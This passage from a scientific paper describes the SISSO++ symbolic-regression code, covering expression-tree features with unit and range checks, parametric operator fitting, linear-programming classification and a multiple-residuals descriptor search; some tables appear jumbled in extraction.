features_, is built by exhaustively applying the set of mathematical operators to the primary features. 
The algorithm is iteratively repeated by applying the set of operators to the primary features or the generated features created at the previous step. The number of iterations in this feature-creation step is called the rung. The subsequent step is _descriptor identification_, i.e., compressed sensing is used to identify the best \(n\)-dimensional linear model by performing an \(\ell_{0}\)-regularized optimization on a subspace \(\mathcal{S}\) of all generated expressions. \(\mathcal{S}\) is selected using sure-independence screening [32], with a suitable projection score, depending on whether one is solving a regression or classification problem (see below). For a regression problem this will rank all generated features according to their Pearson correlation values and select only the most correlated features, essentially performing a one-dimensional \(\ell_{0}\)-regularized linear regression on all features. The result of the SISSO analysis is a \(n-\)dimensional descriptor, which is a vector with components from \(\mathcal{S}\). For a regression problem, the SISSO model is the scalar product of the identified descriptor with the vector of linear coefficients resulting from the \(\ell_{0}\)-regularized linear regression. For a classification problem, the model is given as a set of hyperplanes that divide the points into classes, that are described by the scalar product of the identified descriptor, with a set of coefficients found by linear support vector machines (SVM). Here, we introduce the new concepts implemented in the recently released SISSO++ code [27] and detail their implementation. Beyond creating a modular interface to run SISSO, SISSO++ also improves upon the algorithms in several aspects, for both the feature creation and descriptor identification steps. The most important advancement of the code is expressing the features as binary expression trees, instead of strings, allowing us to recursively define all aspects of the generated expressions from the primary features. With this implementation choice, we are able to create a complete description of the units for each generated feature, as well as an initial representation of its domain and range. This allows for the creation of grammatically correct expressions, in terms of consistency of the physical units, and the control of numerical issues generated by features going out of their physically meaningful range. In terms of the feature-creation step, we also discuss the implementation of _Parameteric SISSO_, which introduces the flexibility of non-linear parameters together with the operators that are optimized against a loss function based on the compressed-sensing-based feature selection metrics. This procedure was used to describe the thermal conductivity of a material in a recent publication [33]. For the descriptor-identification step, we cover two components: an improved classification algorithm and the multi-residual approach. For classification problems, we generalized the algorithm to work for any problem to an arbitrary dimension, and explicitly include a model identification via linear SVM. The multi-residual approach, which was previously used in Ref. [28], introduces further flexibility for the identification of models with more than one dimension. Here, we provide a in-depth discussion of its machinery. ## II Feature Creation ### Binary-Expression-Tree Representation of Features The biggest advancement of the implementation of SISSO in SISSO++, compared to the original implementation in Ref. 
[26], is its modified representation of the features as binary expression trees, instead of strings. This representation is illustrated in Figure 1 and easily allows for all aspects of the generated features to be recursively calculated on the fly from the data stored in the primary features. For certain applications, it is also possible to store the data of higher-rung features, to reduce the overall computational cost of the calculations. The individual features are addressed by the root node of the binary expression tree, and stored in the code as a shared_ptr from the C++ standard library. This representation reduces the overall memory footprint of each calculation, as the individual features only need to be created once and only copies of shared pointers need to be stored for each new expression. The remainder of this section will be used to describe the various aspects of the new representation including a description of the units and range of the features, as well as how it is used to generate the feature space. #### ii.1.1 Units An important upgrade in SISSO++ is its generalized and exact treatment of units for the expressions. In physics, dimensional analysis is an important tool when generating physically meaningful expressions, and it is necessary to include it when using symbolic regression for scientific problems. We introduced this into SISSO++ by determining the units for each new expression from the primary features, and explicitly checking to ensure that a new expression is physically possible. Within the code the Units are implemented as dictionaries with the key representing the base unit and the value representing the exponent for each key, e.g., \(\mathrm{m/s^{2}}\) would be stored as \(\left\{\mathrm{m:1,s:-2}\right\}\). Functions exist to transform the Units to and from strings to more easily represent the information. We then implemented a multiplication, division, and power functions for these specialized dictionaries, allowing for the units of the generated features to be derived recursively following the rules in Table 1. An important caveat is that the current implementation can not convert between two units for the same physical quantity units, e.g. between nanometers, picometers, and Bohr radii. Using this implementation of units, a minimal treatment of dimensional analysis can be performed in the code. The dimensional analysis focuses on whether the units are consistent within each expression and for the final model. For the final model, this check is used to Figure 1: A demonstration of the new representation of the features in the SISSO++ code. The feature is stored as the root of the tree (represented by the thick border), the primary features are the leaves, and the rung corresponds to the height of the tree, i.e. the longest path between each leaf and the root. The unit, range, expressions, and values of the features are necessarily stored only for the primary features, with them defined recursively for all generated expressions. determine the units of the fitted constants in the linear models at the end, which can take arbitrary units, and therefore can do any unit conversion natively. The restrictions, used to reject expressions by dimensional analysis, are outlined in Table 2, and can be summarized as only allowing addition and subtraction to act on features of the same units, and all transcendental operations must act on a unitless quantity. 
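As an illustration (the SISSO++ implementation itself is written in C++), the unit bookkeeping described above can be sketched in a few lines of Python: units are exponent dictionaries that are multiplied, divided, and raised to powers following Table 1, while the restrictions of Table 2 reject additions between mismatched units and transcendental operations on quantities that carry units:

```python
from collections import Counter

def unit_mul(u, v):
    """Multiply two units, e.g. {'m': 1} * {'s': -2} -> {'m': 1, 's': -2}."""
    out = Counter(u)
    for base, exp in v.items():
        out[base] += exp
    return {b: e for b, e in out.items() if e != 0}

def unit_div(u, v):
    return unit_mul(u, {b: -e for b, e in v.items()})

def unit_pow(u, p):
    return {b: e * p for b, e in u.items()}

def unit_add(u, v):
    """Addition/subtraction is only allowed between identical units (Table 2)."""
    if u != v:
        raise ValueError(f"rejected: cannot add {u} and {v}")
    return dict(u)

def check_unitless(u, op_name):
    """Transcendental operators (exp, log, sin, ...) require a unitless argument."""
    if u:
        raise ValueError(f"rejected: {op_name} applied to a feature with units {u}")

velocity, time = {"m": 1, "s": -1}, {"s": 1}
print(unit_div(velocity, time))   # {'m': 1, 's': -2}, i.e. m/s^2
print(unit_pow(velocity, 0.5))    # units of sqrt(velocity)
try:
    unit_add(velocity, time)      # mismatched units -> candidate feature rejected
except ValueError as err:
    print(err)
```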
With these two restrictions in place, only physically possible features can be found, and the choice of units should no longer affect which features are selected. If one wants to allow for non-physical expressions to be found, this can be achieved by providing all input primary features with no units associated to them. #### ii.1.2 Range Another important advancement of the feature-creation step is the introduction of ranges for the primary features, which act as a domain for future operations during feature creation. One of the challenges associated with symbolic regression, especially with smaller datasets, is that the selected expressions can sometimes contain discontinuities that are outside of the training data, but still within the relevant input space for a given problem. For example, this can lead to an expression taking the logarithm of a negative number, resulting in an undefined prediction. SISSO++ solves this problem by including an option for describing the range of a primary feature in standard mathematical notation, e.g. \(\left[0,\infty\right),\) and then using that to calculate the range for all generated formulas using that primary feature, following the rule specified in Table 3. In the code, the ranges are referenced as the Domain because the range for a feature of rung \(n-1\) is the domain for a possible expression of rung \(n\) that is using that feature. While all ranges in Table 3 assume inclusive endpoints, the implementation can handle both exclusive endpoints and a list of values explicitly excluded from the range, e.g., point discontinuities inside the primary features themselves. Table 4 lists the cases where the range of a feature is used to prevent a new expression from being generated. In all cases, this prevents an operation from occurring where a mathematical operation would be not defined, such as taking the square-root of a negative number. In cases where the range of values for a primary feature is not defined, then these checks are not performed and the original assumption that all operations are safe is used. ### Parametric Sisso Parametric SISSO extends the feature creation step of SISSO to automatically include scale and bias terms for each operation, as used in Purcell _et al._[33]. For a general operator, \(\hat{h}\left(\mathbf{x}\right)\in\hat{\mathcal{H}}\), with a set of scale and bias parameters, \(\hat{\mathcal{P}}\), the parameterization scheme updates the operator to be, \[\hat{h}\left(\mathbf{x}\right)\rightarrow\hat{h}^{\hat{\mathcal{P}}}\left( \alpha_{1}\mathbf{x}+\beta_{1}\right), \tag{1}\] \begin{table} \begin{tabular}{l l} \hline Operation & \multicolumn{1}{l}{Unit Restriction} \\ \hline \(A+B\) & Unit(A) == Unit(B) \\ \(A-B\) & Unit(A) == Unit(B) \\ \(\left|A-B\right|\) & Unit(A) == Unit(B) \\ \(\sin\left(A\right)\) & Unit(A) == \(\equiv\emptyset\) \\ \(\cos\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \(\exp\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \(\exp\left(-A\right)\) & Unit(A) == \(\emptyset\) \\ \(\log\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \hline \hline \end{tabular} \end{table} Table 2: Restrictions for each unit, if an operation is not listed there are no restrictions. 
\begin{table} \begin{tabular}{l l} \hline Operation & Resulting Unit \\ \hline \(A+B\) & Unit(A) \\ \(A-B\) & Unit(A) \\ \(A\left(B\right)\) & Unit(A) * Unit(B) \\ \(A/B\) & Unit(A) / Unit(B) \\ \(\left|A-B\right|\) & Unit(A) \\ \(\left|A\right|\) & Unit(A) \\ \(\sin\left(A\right)\) & Unitless \\ \(\cos\left(A\right)\) & Unitless \\ \(\exp\left(A\right)\) & Unitless \\ \(\exp\left(-A\right)\) & Unitless \\ \(\log\left(A\right)\) & Unitless \\ \((A)^{-1}\) & Unit(A)\({}^{-1}\) \\ \((A)^{2}\) & Unit(A)\({}^{2}\) \\ \((A)^{3}\) & Unit(A)\({}^{3}\) \\ \((A)^{6}\) & Unit(A)\({}^{6}\) \\ \(\sqrt{A}\) & Unit(A)\({}^{1/2}\) \\ \(\sqrt{A}\) & Unit(A)\({}^{1/3}\) \\ \hline \hline \end{tabular} \end{table} Table 1: How the units are calculated for each operation Figure 2: A graphical representation of the effect of the parameterization depth. If \(P_{d}=1\) then only the \(\sin\) operator gets parameterized, while if \(P_{d}=2\) both operations are parameterized where \(\alpha_{1}\) is the scale parameter, \(\beta_{1}\) is the bias term, and \(\mathbf{x}\) is a vector containing all input data. These new operators can then be used to create a new feature, \(\hat{\phi}^{\mathcal{P}}\left(\mathbf{x}\right)\), as is normally done in SISSO, where each feature has its own set of parameters. However, this does introduce a new hyperparameter for the feature creation step, the parameterization depth, \(P_{d}\), which defines the level at which the parameterization occurs in the binary expression tree. This is best described in Figure 2, where \(P_{d}\) controls which operations are included in the parameterization. In this example, if \(\beta_{2}\) was previously set by another optimization and \(P_{d}=2\), then that previous value will be ignored for this feature only; however, if \(P_{d}=1\), then the existing \(\beta_{2}\) will be preserved. In order to avoid linear dependencies between different operations and the constants set during linear regression, some of the scale and bias terms are set to one and zero, respectively, for a summary of this for all operators see Table 5. It is important to note that for the log operator, \(\alpha\) is always set to \(\pm 1\) to avoid linear dependencies with other parameters. Although this does leave a unit dependency, it can be removed with \[\ln\left(x+\beta\right)\rightarrow\ln\left(\alpha_{\text{unit}}\left(x+\beta \right)\right)-\ln\left(\alpha_{\text{unit}}\right), \tag{2}\] where \(\alpha_{\text{unit}}\) is the unit conversion factor. Once \(\hat{\phi}^{\mathcal{P}}\left(\mathbf{x}\right)\) is defined, all parameters \(\hat{p}\in\hat{\mathcal{P}}\) are optimized using the non-linear optimization library NLopt [34]. 
\begin{table} \begin{tabular}{l l} \hline Operation & Parameterized Operation \\ \hline \(A+B\) & \(A+\alpha B\) \\ \(A-B\) & \(A-\alpha B\) \\ \(A\left(B\right)\) & \(A\left(B+\beta\right)\) \\ \(A/B\) & \(A/\left(B+\beta\right)\) \\ \(\left|A-B\right|\) & \(\left|A-\left(\alpha B+\beta\right)\right|\) \\ \(\left|A\right|\) & \(\left|A+\beta\right|\) \\ \(\sin\left(A\right)\) & \(\sin\left(\alpha A+\beta\right)\) \\ \(\cos\left(A\right)\) & \(\cos\left(\alpha A+\beta\right)\) \\ \(\exp\left(A\right)\) & \(\exp\left(\alpha A\right)\)1 \\ \(\exp\left(-A\right)\) & \(\exp\left(-\alpha A\right)\)2 \\ \(\log\left(A\right)\) & \(\log\left(A+\beta\right)\)3 \\ \((A)^{-1}\) & \((A+\beta)\)4 \\ \((A)^{2}\) & \((A+\beta)\)5 \\ \((A)^{3}\) & \((A+\beta)\)6 \\ \((A)^{3}\) & \(\left[\left(\min\left(A\right)\right)^{3},\left(\max\left(A\right)\right)^{3}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(|A|\) & \(\left[\max\left(0,\min\left(A\right)\right),\max\left(\left|\max\left(A\right) \right|,\left|\min\left(A\right)\right|\right)\right]\) \\ \((A)^{2}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{2},\max\left(\left|\max\left(A \right)\right|,\left|\min\left(A\right)\right|\right)^{2}\right]\) \\ \((A)^{6}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{6},\max\left(\left|\max\left(A \right)\right|,\left|\min\left(A\right)\right|\right)^{6}\right]\) \\ \(|A-B|\) & \(\left[\max\left(0,\min\left(A\right)-\max\left(B\right)\right)\right],\left|\min \left(\max\left(A\right)-\min\left(B\right)\right)\right]\) \\ \hline \hline \end{tabular} \end{table} Table 4: Domain restrictions for each operation, if an operation is not listed there are no restrictions. 
\begin{table} \begin{tabular}{l l} \hline Operation & Domain Restriction \\ \hline \(A/B\) & \(0\notin\) Range (B) \\ \((A)^{-1}\) & \(0\notin\) Range (A) \\ \(\log\left(A\right)\) & \(\min\left(\text{Range}\left(A\right)\right)>0\) \\ \(\sqrt{A}\) & \(\min\left(\text{Range}\left(A\right)\right)\geq 0\) \\ \hline \hline \end{tabular} \end{table} Table 3: How the range for each operation is calculated \begin{table} \begin{tabular}{l l} \hline Operation & Resulting Range \\ \hline \(A+B\) & \(\left[\min\left(A\right)+\min\left(B\right),\max\left(A\right)+\max\left(B\right)\right]\) \\ \(A-B\) & \(\left[\min\left(A\right)-\max\left(B\right),\max\left(A\right)-\min\left(B\right)\right]\) \\ \(A\left(B\right)\) & \(\left[\min\left(\min\left(A\right)*\min\left(B\right),\min\left(A\right)*\max \left(B\right),\max\left(A\right)*\min\left(B\right),\max\left(A\right)*\max \left(B\right)\right),\right.\) \\ & \(\max\left(\min\left(A\right)*\min\left(B\right),\min\left(A\right)*\max \left(B\right),\max\left(A\right)*\min\left(B\right),\max\left(A\right)*\max \left(B\right)\right)\right]\) \\ \(A/B\) & \(\left[\text{Range}\left(A\right)*\text{Range}\left(B^{-1}\right)\right]\) \\ \(\sin\left(A\right)\) & \(\left[-1,1\right]\) \\ \(\cos\left(A\right)\) & \(\left[-1,1\right]\) \\ \(\exp\left(A\right)\) & \(\left[\exp\left(\min\left(A\right)\right)\right),\exp\left(\max\left(A\right)\right)\)] \\ \(\exp\left(-A\right)\) & \(\left[\exp\left(-\max\left(A\right)\right),\exp\left(-\min\left(A\right)\right)\right]\) \\ \(\log\left(A\right)\) & \(\left[\log\left(\min\left(A\right)\right),\log\left(\max\left(A\right)\right)\right]\) \\ \((A)^{-1}\) & if\(\left(0\in\) Range (A)\right)\): \\ & \(\left(-\infty,0\right)\cup\left(0,\infty\right)\) \\ & else: \\ & \(\left[\left(\max\left(A\right)\right)^{-1},\left(\min\left(A\right)\right)^{-1}\right]\) \\ \((A)^{3}\) & \(\left[\left(\min\left(A\right)\right)^{3},\left(\max\left(A\right)\right)\right]^{3}\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(|A|\) & \(\left[\max\left(0,\min\left(A\right)\right),\max\left(\left|\max\left(A\right)\right|, \left|\min\left(A\right)\right|\right)]\) \\ \((A)^{2}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{2},\max\left(\left|\max\left(A\right) \right|,\left|\min\left(A\right)\right|\right)^{2}]\) \\ \((A)^{6}\) & \(\left[\max\left We use the Cauchy loss function as the objective for the optimization \[\min_{\hat{\mathcal{P}}}f\left(\mathbf{P},\hat{\phi}^{\hat{\mathcal{P }}}\right) \tag{3a}\] \[f\left(\mathbf{P},\hat{\phi}^{\hat{\mathcal{P}}}\right)=\sum_{i}^ {n_{\text{ramp}}}\frac{c^{2}}{n_{\text{ramp}}}\log\left(1+\left(\frac{P_{i}- \hat{\phi}^{\hat{\mathcal{P}}}\left(\mathbf{x}_{i}\right)}{c}\right)^{2} \right), \tag{3b}\] where \(\mathbf{P}\) is a property vector, \(c\) is a scaling factor set to 0.5 for all calculations and \(n_{\text{ramp}}\) is the number of samples. We chose to use the Cauchy loss function over the mean square error to make the non-linear optimization more robust against outliers in the dataset. Because Equation 3b is not scale or bias invariant, additional external parameters \(\alpha_{ext}\) and \(\beta_{ext}\) are introduced to respectively account for these effects. 
For the case of multi-task SISSO [25], each task has its own external bias and scale parameters to account for the individual linear regression solutions. As an example for the feature illustrated in Figure 2 (\(P_{d}=2\)), the function that is optimized would be \[\hat{\phi}^{\hat{\mathcal{P}}}\left(\mathbf{x}\right)=\alpha_{ext}\sin\left( \alpha_{1}\frac{x_{1}}{x_{2}+\beta_{2}}+\beta_{1}\right)+\beta_{ext}. \tag{4}\] To initialize the parameters in \(\hat{\mathcal{P}}\), we set all internal \(\alpha\) and \(\beta\) terms are set to 1.0 and 0.0, respectively, and \(\alpha_{ext}\) and \(\beta_{ext}\) are set to the solution of the least squares regression problem for each task. In some cases, \(\beta\) can be set to a non-zero value if leaving it at zero would include values outside the Domain of the operator. In these cases, \(\beta\) is set to \(\min\left(\mathbf{x}\right)+10^{-10}\). Each optimization follows a two or three step process outlined here. First a local optimization is performed to find the local minimum associated with the initial parameters. Once at a local minimum an optional global optimization is performed to find any minima that are better than the one initially found. For these first two steps the parameters are optimized to a relative tolerance of \(10^{-3}\) and \(10^{-2}\) respectively, with a maximum of five thousand function evaluations. Finally, a more accurate local optimization is done to a relative tolerance of \(10^{-6}\) to find the best parameter set. For this final optimization, ten thousand function evaluations are allowed. Additionally, for both the initial and global optimization steps, the parameters are bounded to be in a range between -100 and 100 to improve the efficiency of the optimization, but this restriction is removed for the final optimization. For all local optimizations, the subplex algorithm [35], a faster and more robust variant of the Nelder-Mead Simplex method [36], is used. The Figure 3: A comparison of the expressions found non-parametric (a, c, and e) and parametric SISSO (b, d, and f) for a Lorentzian (a, b, e, and f) and sin (c, d) function. Blue dots represent the training data, and the red line represents the expressions found by SISSO. The parameterization scheme either finds the correct (b and d) or better model (f) than the non-parametric functions, even when the high noise or bad initial guess of the parameters leads to a non-optimized solution. Improved Stochastic Ranking Evolution Strategy algorithm [37] is used for all global optimizations. Once optimized, only the internal \(\alpha\) and \(\beta\) parameters are stored in \(\tilde{\mathcal{P}}\). Figure 3 illustrates the power of the new parameterization scheme. For both toy problems represented by analytic Lorentzian and sin functions with some white noise, the non-parametric version of SISSO can not find accurate models for the equations as it can not address the non-linearities properly. By using this new parameterization scheme, SISSO is now able to accurately find the models as shown in Figure 3c and d. However, it is important to note that the more powerful featurization comes at the cost of a significantly increased time to generate the feature space, as the parameterization becomes the bottleneck for the calculations. Additionally, there can be cases where the parameterization scheme does not find an optimal solution because of too much noise or the optimal parameters being too far away from the initial guesses, as shown in Figure 3e and f. 
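As a rough illustration of this optimization (SISSO++ itself uses the NLopt implementations of the subplex and Improved Stochastic Ranking Evolution Strategy algorithms mentioned above), the example feature of Eq. (4) can be fitted to synthetic data with the Cauchy loss of Eq. (3), here using SciPy's Nelder-Mead method as a stand-in for the local optimizer:

```python
import numpy as np
from scipy.optimize import minimize

def cauchy_loss(params, x1, x2, y, c=0.5):
    """Cauchy loss of Eq. (3) for the rung-2 feature of Fig. 2 with P_d = 2."""
    a1, b1, b2, a_ext, b_ext = params
    pred = a_ext * np.sin(a1 * x1 / (x2 + b2) + b1) + b_ext
    return np.mean(c**2 * np.log1p(((y - pred) / c) ** 2))

rng = np.random.default_rng(0)
x1, x2 = rng.uniform(0.1, 2.0, 200), rng.uniform(0.5, 2.0, 200)
y = 1.5 * np.sin(2.0 * x1 / (x2 + 0.3) + 0.1) + 0.2   # synthetic target
y = y + rng.normal(0.0, 0.05, y.shape)                 # white noise

# Internal scales start at 1 and biases at 0; the external scale and bias here
# start from a crude guess (the code initializes them from a least-squares fit).
p0 = np.array([1.0, 0.0, 0.0, y.std(), y.mean()])
res = minimize(cauchy_loss, p0, args=(x1, x2, y), method="Nelder-Mead",
               options={"maxfev": 10_000, "fatol": 1e-6})
print(res.x)  # optimized (alpha_1, beta_1, beta_2, alpha_ext, beta_ext)
```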
### Building the Complete Feature Set With all of the new aspects of the feature representation in place, SISSO++ has a fully parallelized feature set construction that uses a combination of threads and MPI ranks, for efficient feature set construction. The basic process of creating new features is illustrated in Figure 4, where each new rung builds on top of existing features by adding a new operation on top of existing binary expression trees for the previous rung. Throughout this process all checks are done to ensure that the units are correct and the domains for each new operation are respected. Additionally, the code checks for invalid values, e.g., NaN or inf, and some basic simplifications for all features, e.g., features like \(\frac{\text{inf}}{\omega}\) are rejected. The operators are separated into parameterized and non-parameterized versions of each other to allow for the optional use of the parametric SISSO concepts. Figure 4: Illustration of how the feature space of SISSO is created. In this example the user selects two primary features \(\omega\) (purple) and \(t\) (orange) and three operators sin (blue), multiplication (green), and division (red). SISSO then builds up a more complicated expression space by applying the operations onto the existing features by increasing the height of the binary expression trees. Throughout this process the units and ranges of each of the operations are respected. ## III Descriptor identification ### Linear Programming Implementation for Classification Problems One of the largest updates to the SISSO methodology is the new, generalized approach for solving classification problems. In previous implementations, when finding a classification scheme, SISSO would explicitly build the convex hull, and then calculate the number of points inside the overlap region between different classes and either the normalized overlap volume or separation distance to find the optimal solution. While this works for two dimensions, finding the overlap volume or separation distance becomes intractable for three or more dimensions, and even defining the convex hull becomes intractable for four or more dimensional classification. SISSO++ replaces these conditions with an algorithm that determines the number of points inside the convex hull overlap region using linear programming, and explicitly creates a model using linear SVM. The linear programming algorithm checks for the feasibility of \[\min 0 \tag{5}\] \[\text{s.t.}\sum_{i\in I}^{\min}\alpha_{i}x_{i}=x_{j},\quad\sum_{i \in I}\alpha_{i}=1,\quad\alpha_{i}\geq 0,\ \forall i\in I, \tag{6}\] where \(x_{i}\) is the \(i^{th}\) point inside the set of all points of a class \(I\), \(\alpha_{i}\) is the coefficient for \(x_{i}\), and \(x_{j}\) is the point to check if it is inside the convex hull. The above problem is only feasible if and only if \(x_{j}\) lies inside the set of points, \(I\), representing a class in the problem. Here we are optimizing a zero function because the actual solution to this optimization does not matter, only that such a solution can be found, i.e. the constraints can be fulfilled, is important. The feasibility and linear programming problem is defined using the Coin-CLP library [38]. Once the number of points in the overlap region is determined, a linear SVM model is calculated for the best candidates, and used as the new tie-breaking procedure. The first tiebreaker is the number of misclassified points by the SVM model and the second one is the margin distance. 
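For illustration, the convex-hull membership check of Eqs. (5) and (6) can be sketched with SciPy's general-purpose linear-programming routine as a stand-in for Coin-CLP:

```python
import numpy as np
from scipy.optimize import linprog

def in_convex_hull(points, x_j):
    """Check whether x_j is a convex combination of `points` (Eqs. 5-6).

    points: (n_samples, n_dims) array holding one class; x_j: (n_dims,) query.
    The LP minimizes a zero objective, so only feasibility matters.
    """
    n = points.shape[0]
    # Constraints: sum_i alpha_i x_i = x_j, sum_i alpha_i = 1, alpha_i >= 0.
    A_eq = np.vstack([points.T, np.ones((1, n))])
    b_eq = np.concatenate([x_j, [1.0]])
    res = linprog(c=np.zeros(n), A_eq=A_eq, b_eq=b_eq,
                  bounds=[(0, None)] * n, method="highs")
    return res.success

rng = np.random.default_rng(0)
class_a = rng.normal(size=(50, 3))
print(in_convex_hull(class_a, np.zeros(3)))       # near the centre: inside
print(in_convex_hull(class_a, np.full(3, 10.0)))  # far away: outside
```

Counting, for each sample, whether it lies inside the hull of the opposite class gives the number of points in the overlap region used to rank candidate descriptors; the SVM-based tiebreakers described above are then applied to the best candidates.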
The SVM model is calculated using libsvm [39]. Figure 5 demonstrates the capabilities of the new classification algorithm. In this problem, we randomly sample a Gaussian distribution with a standard deviation of 0.5 and centered at the origin to generate one thousand samples for three features, \(x_{0}\), \(x_{1}\), and \(x_{2}\). These three features are then copied and relabeled as \(x_{3}\), \(x_{4}\), and \(x_{5}\). The samples are then separated into two classes based on whether \((x_{1}+x_{2}+x_{3})\) is greater than (light blue) or less than (red) zero. For \(x_{0}\), \(x_{1}\), and \(x_{2}\), we move all points where \(|x_{1}+x_{2}+x_{3}|<0.4\) to a random point further away from the dividing plane within each of their classes to ensure a noticeable margin of separation. For simplicity, we use only the six primary features shown on the axes of Figure 5a and b with no generated expressions; however, the rung 2 feature of \((x_{0}+x_{1})+x_{2}\) would be able to completely separate the classes in one dimension. Using the updated algorithm, SISSO can now easily identify that the set \(\{x_{0},x_{1},x_{2}\}\) is the better classifier than the set \(\{x_{3},x_{4},x_{5}\}\), as the tiebreakers are defined for all dimensions and not just the first two. More importantly, SISSO can now provide the \(n\)-dimensional dividing plane found by linear SVM, creating an actual classifier automatically, here shown by the green plane. It is important to note that the same procedure can be applied in an arbitrary dimension, but visualization becomes impractical above three. Figure 5: A demonstration of the classification algorithm. A set of 1000 points of three features, \(x_{0}\), \(x_{1}\), and \(x_{2}\), are sampled from a Gaussian distribution with a standard deviation of 0.5 and centered at the origin. The set is separated into 2 classes (the red and light blue circles) by the plane \(x_{0}+x_{1}+x_{2}=0\) (green surface). a) All points where \(|x_{1}+x_{2}+x_{3}|<0.4\) are moved to a random point that has a distance of 0.2\(\sqrt{2}\) to 0.35\(\sqrt{2}\) from the plane within each of their own classes, and b) the original data stored as \(x_{3}\), \(x_{4}\), and \(x_{5}\). The updated classification algorithm correctly determines that \(x_{0}\), \(x_{1}\), and \(x_{2}\) is the superior classifier, while with the original definitions of only the convex overlap region for three and more dimensions they would be considered equally good. The projections are shown with an elevation angle of 7.5 degrees and an azimuthal angle of 145 deg. ### Multiple Residuals The second advancement to the descriptor-identification step of the SISSO algorithm is the introduction of a _multiple-residuals_ approach to select the expressions (features) for models with a dimension higher than one. In the original SISSO algorithm [40], the residual of the previously found model, \(\vec{\Delta}_{D-1}^{0}\), i.e., the difference between the vector storing the values of the property for each sample, \(\vec{P}\), and the estimates predicted by the \((D-1)\)-dimensional model (\(\vec{\Delta}_{D-1}^{0}=\vec{P}_{D-1}-\vec{P}\)), is used to calculate the projection score of the candidate features during the SIS step for the best \(D\)-dimensional model, \(s_{j}^{0}=R^{2}\left(\vec{\Delta}_{D-1}^{0},\vec{d}_{j}\right)\). Here, \(R\) is the Pearson correlation coefficient, representing a regression problem, and \(j\) corresponds to each expression generated during the feature-creation step of SISSO.
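In a simplified form (not the actual SISSO++ routine), this SIS step amounts to ranking every generated feature by its squared Pearson correlation with the current residual and keeping the \(n_{\text{sis}}\) highest-ranked candidates:

```python
import numpy as np

def sis_select(candidates, residual, n_sis):
    """Rank candidate feature columns by R^2 against the residual.

    candidates: (n_samples, n_features) array of generated feature values;
    residual:   (n_samples,) residual of the previously found model.
    Returns the column indices of the n_sis most correlated candidates.
    """
    X = candidates - candidates.mean(axis=0)
    r = residual - residual.mean()
    denom = np.linalg.norm(X, axis=0) * np.linalg.norm(r) + 1e-12
    scores = (X.T @ r / denom) ** 2   # squared Pearson correlation per feature
    return np.argsort(scores)[::-1][:n_sis]

# With several residuals (the extension described next), each candidate keeps
# the maximum of its scores over all tracked residuals before ranking.
```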
In SISSO++ [27], we extend the residual definition and use the best \(r\) residuals to calculate the projection score: \(\max\left(s_{j}^{0},s_{j}^{1},\ldots,s_{j}^{r-1}\right)\). The multiple-residual concept generalizes the descriptor identification step of SISSO, by using information from an ensemble of models to determine which features to add to the selected subspace. The value of \(r\) for a calculation is set via cross-validation, as for any other hyperparameter. This process is illustrated in Fig. 6 for a three-dimensional problem space (three training samples) defined by \(\mathbf{e_{1}}\), \(\mathbf{e_{2}}\), and \(\mathbf{e_{3}}\) with five candidate features \(\mathbf{F_{1}},\cdots,\mathbf{F_{5}}\) to describe the property \(\mathbf{P}\). In principle, there can be an arbitrary number of feature vectors, but for clarity we only show five. If only a single residual is used, then the selected two-dimensional model will comprise \(\mathbf{F_{1}}\) and \(\mathbf{F_{4}}\), as \(\mathbf{F_{3}}\) is never selected because it has the smallest projection score from the residual of the model found using \(\mathbf{F_{1}}\). However, because \(\mathbf{F_{2}}\) has a component along \(\mathbf{e_{2}}\), a better two-dimensional model consisting of a linear combination of \(\mathbf{F_{2}}\) and \(\mathbf{F_{3}}\) exists, despite \(\mathbf{F_{2}}\) not being the most correlated feature to \(\mathbf{P}\). When going to higher dimensional feature spaces, it becomes more likely that the feature vectors similarly correlated to the property contain orthogonal information, thus the need for using multiple residuals in SISSO. In order to demonstrate the effect of learning over multiple residuals and get an estimate of the optimal number of residuals and size of the SIS subspace (\(n_{\text{sis}}\)), we plot, in Fig. 7, the training RMSE of the two-dimensional models for the function \(y=5.5+0.4158d_{1}-0.0974d_{2}+\delta\), where \(d_{1}=x_{0}^{2}\sqrt[3]{x_{1}}\), \(d_{2}=\left|x_{2}^{3}\right|\), and \(\delta\) is a Gaussian white noise term pulled from a distribution with a standard deviation of \(0.05\). For this problem, the best one-dimensional descriptor is \(\frac{1}{\sqrt[3]{x_{3}}}\), with \(x_{3}\) being explicitly set to \(\left(y+\Delta\right)^{-3}\), where \(\Delta\) is Gaussian white noise with a standard deviation of \(20.0\). This primary feature was Figure 6: An illustration of how tracking multiple residuals can improve the performance of SISSO. A three dimensional problem space (three training samples) defined by \(\mathbf{e_{1}}\), \(\mathbf{e_{2}}\), and \(\mathbf{e_{3}}\) with five feature vectors \(\mathbf{F_{1}}\) (gray), \(\mathbf{F_{2}}\) (blue), \(\mathbf{F_{3}}\) (red), \(\mathbf{F_{4}}\) (brown), and \(\mathbf{F_{5}}\) (turquoise) for a property vector, \(\mathbf{P}\) (purple). For this example the size of the SIS subspace, \(n_{sis}\), is two. The residuals for the best (\(\mathbf{\Delta_{1}}\), gray) and second-best (\(\mathbf{\Delta_{2}}\), blue) one-dimensional models are shown as dashed lines. If the number of residuals, \(n_{res}\), is one, then only \(\mathbf{\Delta_{1}}\) is used (d, e) and \(\mathbf{F_{3}}\) will not be selected in the second SIS step. This means the best two dimensional model is not found. However, if \(n_{res}=2\) (b, c), then \(\mathbf{F_{3}}\) is selected and the best two dimensional model, a combination of \(\mathbf{F_{2}}\) and \(\mathbf{F_{3}}\), can be found in the second \(\ell_{0}\) step.
